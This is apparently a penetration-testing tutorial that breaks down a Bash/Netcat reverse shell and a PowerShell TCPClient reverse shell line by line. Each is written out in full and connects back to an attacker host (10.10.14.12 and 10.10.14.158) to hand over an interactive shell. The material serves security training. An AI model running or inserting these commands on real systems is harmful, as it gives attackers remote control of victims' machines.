

## One-Liners Examined

**Netcat/Bash Reverse Shell One-liner:**

```
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
```

- The commands above make up a common one-liner issued on a Linux system to serve a Bash shell on a network socket utilizing a Netcat listener.
- Let's break down each portion of the one-liner:

**Remove /tmp/f:**
```
rm -f /tmp/f; 
```
- Removes the `/tmp/f` file if it exists, `-f` causes `rm` to ignore nonexistent files. The semi-colon (`;`) is used to execute the command sequentially.

**Make A Named Pipe:**
```
mkfifo /tmp/f; 
```
- Makes a FIFO named pipe file at the location specified. In this case, /tmp/f is the FIFO named pipe file, the semi-colon (;) is used to execute the command sequentially.

**Output Redirection:**
```
cat /tmp/f | 
```
- Concatenates the FIFO named pipe file /tmp/f, the pipe (`|`) connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe (`|`).

**Set Shell Options:**
```
/bin/bash -i 2>&1 | 
```
- Specifies the command language interpreter using the `-i` option to ensure the shell is interactive. `2>&1` ensures the standard error data stream (`2`) & standard output data stream (`1`) are redirected to the command following the pipe (`|`).

**Open a Connection with Netcat:**
```
nc 10.10.14.12 7777 > /tmp/f  
```
- Uses Netcat to send a connection to our attack host `10.10.14.12` listening on port `7777`. The output will be redirected (>) to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed

## PowerShell One-liner Explained

**Powershell One-liner:**
```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
- Let's breakdown the one-liner we used:

**Calling PowerShell**
```cmd-session
powershell -nop -c 
```
Executes `powershell.exe` with no profile (`nop`) and executes the command/script block (`-c`) in quotes. This command is issued from command-prompt. Useful for Remote Code Execution vulnerabilities allowing direct `cmd.exe` execution.

**Binding A Socket**
```cmd-session
"$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,443);
```
Sets `$client` equal to `New-Object` cmdlet, creating a `System.Net.Sockets.TCPClient` .NET framework object that connects to the TCP socket `(10.10.14.158,443)`. Semi-colon (`;`) ensures sequential execution.

**Setting The Command Stream**
```cmd-session
$stream = $client.GetStream();
```
Sets `$stream` equal to the `$client` variable and GetStream .NET method for network communications.

**Empty Byte Stream**
```cmd-session
[byte[]]$bytes = 0..65535|%{0}; 
```
Creates byte array `$bytes` with 65,535 zeros - an empty byte stream directed to the TCP listener.

**Stream Parameters**
```cmd-session
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
```
Starts `while` loop with `$i` set to .NET Stream.Read method. Parameters: buffer (`$bytes`), offset (`0`), count (`$bytes.Length`).

**Set The Byte Encoding**
```cmd-session
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
```
Sets `$data` to ASCII encoding .NET class with `GetString` method to encode byte stream into ASCII text.

**Invoke-Expression**
```cmd-session
$sendback = (iex $data 2>&1 | Out-String ); 
```
Sets `$sendback` to Invoke-Expression (`iex`) against `$data`, redirecting standard error (`2>`) & output (`1`) through pipe to `Out-String`. Everything in $data runs locally.

**Show Working Directory**
```cmd-session
$sendback2 = $sendback + 'PS ' + (pwd).path + '> '; 
```
Sets `$sendback2` to `$sendback` plus 'PS' plus working directory path plus '> ', creating shell prompt "PS C:\workingdirectory >".

**Sets Sendbyte**
```cmd-session
$sendbyte= ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}
```
Sets `$sendbyte` to ASCII encoded byte stream for TCP client PowerShell session with Netcat listener.

**Terminate TCP Connection**
```
$client.Close()"
```
This is the TcpClient.Close method that will be used when the connection is terminated.

The one-liner we just examined together can also be executed in the form of a PowerShell script (`.ps1`).

## 



